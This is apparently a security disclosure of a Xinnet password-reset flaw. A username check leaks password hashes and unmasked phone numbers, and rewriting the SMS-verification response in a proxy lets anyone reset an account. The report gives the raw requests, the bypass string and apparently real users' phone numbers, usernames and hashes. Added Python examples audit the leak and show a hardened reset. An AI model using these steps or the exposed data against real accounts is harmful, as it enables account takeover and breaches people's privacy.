A design flaw at Xinnet allows arbitrary user password reset and leaks phone numbers and password hashes (Dianping as an example)

Brief description:

A design flaw at Xinnet allows arbitrary user password reset and leaks phone numbers and password hashes (Dianping as an example)

Detailed description:

The password reset starts from a sensitive information leak.

Code area
POST /user/userlogin.do?method=checkUserName HTTP/1.1
Host: www.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 18
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.xinnet.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.xinnet.com/views/loginnew/forgetpwd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

userName=hy4911980



Through this leak the `checkUserName` endpoint, which only needs to say whether a username exists, hands back the whole user record, including the password hash and the unmasked phone number:

Code area
{"id":4535227,"agentCode":"hy4911980","email":"151******71","password":"$1$39$QCqKIUdkYwfj20lFApPbE0","mobileNum":"15165955871","state":"02"}

Code area
{"id":4535226,"agentCode":"hy4911979","userEmail":"[email protected]","userNameEmail":"[email protected]","email":"138******38","password":"$1$99$E/YOf1qM9JWviO5wdnXes0","mobileNum":"13832465238","state":"02"}

The `password` field is not in a format the report identifies; the `$1$` prefix is the MD5-based crypt(3) scheme (md5crypt), which is cheap to attack offline, but we can set that aside for now. Note also that the response masks the number once (in `email`) and returns it in full in `mobileNum`. What we need for the reset is the member's phone number.
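The kind of response check that would have caught this leak, as an added example that is not part of the original report or Xinnet's code: it audits a JSON response body (a constructed copy modelled on the first record above, not live data) against an allowlist of fields a username-existence endpoint actually needs, flags secrets and unmasked identifiers, names the hash format from its prefix, and shows the minimal response the endpoint should have returned. The allowlist, the field names and the masking rule are assumptions.

```python
import json
import re

# Constructed sample, modelled on the checkUserName response quoted above (not live data).
SAMPLE_LEAKY = ('{"id":4535227,"agentCode":"hy4911980","email":"151******71",'
                '"password":"$1$39$QCqKIUdkYwfj20lFApPbE0","mobileNum":"15165955871","state":"02"}')

# Assumption: a "does this username exist" endpoint needs nothing beyond these fields.
ALLOWED_FIELDS = {"agentCode", "state"}
# Fields that must never reach the client, masked or not.
SECRET_FIELDS = {"password", "passwd", "pwd", "salt"}

# crypt(3)-style prefixes and common raw-digest shapes, checked in order.
HASH_FORMATS = [
    (r"^\$1\$", "md5crypt (MD5-based crypt(3))"),
    (r"^\$2[aby]\$", "bcrypt"),
    (r"^\$5\$", "sha256crypt"),
    (r"^\$6\$", "sha512crypt"),
    (r"^[0-9a-fA-F]{32}$", "raw MD5 (unsalted)"),
    (r"^[0-9a-fA-F]{40}$", "raw SHA-1 (unsalted)"),
]


def identify_hash(value):
    """Name the password-hash format from its prefix or shape, or 'unknown'."""
    for pattern, name in HASH_FORMATS:
        if re.match(pattern, value):
            return name
    return "unknown"


def mask_mobile(number):
    """Mask a phone number the way the response's own 'email' field already does:
    keep the first 3 and the last 2 digits."""
    if len(number) <= 5:
        return "*" * len(number)
    return number[:3] + "*" * (len(number) - 5) + number[-2:]


def audit_response(body):
    """Return (field, reason) pairs for every field that should not be in the response."""
    data = json.loads(body)
    findings = []
    for key, value in data.items():
        if key in SECRET_FIELDS:
            findings.append((key, "secret returned to client; format: " + identify_hash(str(value))))
        elif key == "mobileNum" and re.fullmatch(r"\d{11}", str(value)):
            findings.append((key, "unmasked phone number"))
        elif key not in ALLOWED_FIELDS:
            findings.append((key, "not needed by the caller"))
    return findings


def minimal_response(body):
    """What the endpoint should answer with: existence plus account state, nothing identifying."""
    data = json.loads(body)
    return json.dumps({"exists": "agentCode" in data, "state": data.get("state")})


if __name__ == "__main__":
    for field, reason in audit_response(SAMPLE_LEAKY):
        print(f"{field}: {reason}")
    print("should have been:", minimal_response(SAMPLE_LEAKY))
```

Running it against the sample reports `password` (md5crypt), `mobileNum` (unmasked), and `id` and `email` as fields the caller never needed; the same audit can be pointed at any JSON endpoint that sits behind a "forgot password" form.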

Go to the password recovery page and start a reset with the member name (hy4911979) and phone number (13832465238):

[Image 1]



Capture the request:

Code area
POST /user/userlogin.do?method=checkMobileVerifyCode HTTP/1.1
Host: www.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 33
Accept: text/plain, */*; q=0.01
Origin: http://www.xinnet.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.xinnet.com/views/loginnew/forgetpwd.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

MobileNum=13832465238&Code=123456





Modify the response to this request (in the intercepting proxy) to: verify_code_is_right. The page's script only checks this string before moving on to the new-password step, and that step goes through without the server re-checking the SMS code, so a rewritten response is all it takes; the `Code=123456` we sent was never a valid code.

[Image 2]

[Image 3]

The password is reset. Log in with account 13832465238 and password wooyuntest123:

[Image 4]

[Image 5]
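The flaw and its fix side by side, as an added example that is not part of the original report or Xinnet's code. `VulnerableReset` reproduces the pattern described above: a verify endpoint that answers with a bare string, a client that looks for `verify_code_is_right`, and a reset endpoint that trusts the client to have checked it. `HardenedReset` has the verify endpoint return an HMAC-signed, single-use, short-lived ticket bound to the phone number, which the reset endpoint requires; it also caps attempts, since a 6-digit code is guessable otherwise. The class names, the attempt limit, the ticket lifetime and the signing key are assumptions.

```python
import hashlib
import hmac
import os
import secrets
import time

# Assumption: a per-deployment secret that never leaves the server.
SERVER_KEY = os.urandom(32)


class VulnerableReset:
    """The pattern the report describes: checkMobileVerifyCode answers with a bare
    string, the page's script looks for 'verify_code_is_right', and the final
    password-setting request carries no proof that the check ever passed."""

    def __init__(self, sent_codes):
        self.sent_codes = sent_codes      # mobile -> SMS code actually sent
        self.passwords = {}

    def check_code(self, mobile, code):
        if self.sent_codes.get(mobile) == code:
            return "verify_code_is_right"
        return "verify_code_is_wrong"     # a proxy rewrites this and the client moves on

    def reset(self, mobile, new_password):
        # Nothing here ties the call to a successful check_code: any caller succeeds.
        self.passwords[mobile] = new_password
        return True


class HardenedReset:
    """Verification yields an HMAC-signed, single-use, short-lived ticket bound to the
    phone number; reset accepts only that ticket. Rewriting the verify response in a
    proxy cannot mint one because SERVER_KEY stays server-side."""

    MAX_ATTEMPTS = 5      # assumption: lockout threshold per phone number
    TICKET_TTL = 300      # assumption: seconds a ticket stays valid

    def __init__(self, sent_codes, now=time.time):
        self.sent_codes = sent_codes
        self.attempts = {}
        self.used = set()
        self.passwords = {}
        self.now = now                    # injectable clock, for testing expiry

    def _sign(self, mobile, nonce, expiry):
        msg = f"{mobile}|{nonce}|{expiry}".encode()
        return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

    def check_code(self, mobile, code):
        n = self.attempts.get(mobile, 0) + 1
        self.attempts[mobile] = n
        if n > self.MAX_ATTEMPTS:
            return None                   # locked out, even if this guess is right
        expected = self.sent_codes.get(mobile, "")
        if not hmac.compare_digest(str(expected).encode(), str(code).encode()):
            return None
        self.sent_codes.pop(mobile, None)  # the SMS code is consumed on success
        nonce = secrets.token_hex(8)
        expiry = int(self.now()) + self.TICKET_TTL
        return f"{mobile}|{nonce}|{expiry}|{self._sign(mobile, nonce, expiry)}"

    def reset(self, ticket, new_password):
        try:
            mobile, nonce, expiry, sig = ticket.split("|")
            expiry = int(expiry)
        except (ValueError, AttributeError):
            return False                  # malformed, e.g. a bare "verify_code_is_right"
        if ticket in self.used or expiry < self.now():
            return False
        if not hmac.compare_digest(sig.encode(), self._sign(mobile, nonce, expiry).encode()):
            return False
        self.used.add(ticket)             # single use
        self.passwords[mobile] = new_password
        return True


if __name__ == "__main__":
    codes = {"13832465238": "841927"}     # constructed: the code the SMS gateway sent
    v = VulnerableReset(dict(codes))
    print("vulnerable:", v.check_code("13832465238", "123456"), "-> reset anyway:", v.reset("13832465238", "wooyuntest123"))
    h = HardenedReset(dict(codes))
    print("hardened, wrong code:", h.check_code("13832465238", "123456"))
    print("hardened, forged ticket:", h.reset("verify_code_is_right", "wooyuntest123"))
```

The point is where the proof lives: in the vulnerable flow the only evidence that the code was checked is a string the browser sees, so the proxy controls it; in the hardened flow the evidence is a signature only the server can produce, and the reset endpoint verifies it itself rather than trusting the previous step.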

Proof of vulnerability:

Dianping as an example:

Reset credentials: account 15800310255, password wooyuntest123

[Image 6]

[Image 7]

[Image 8]
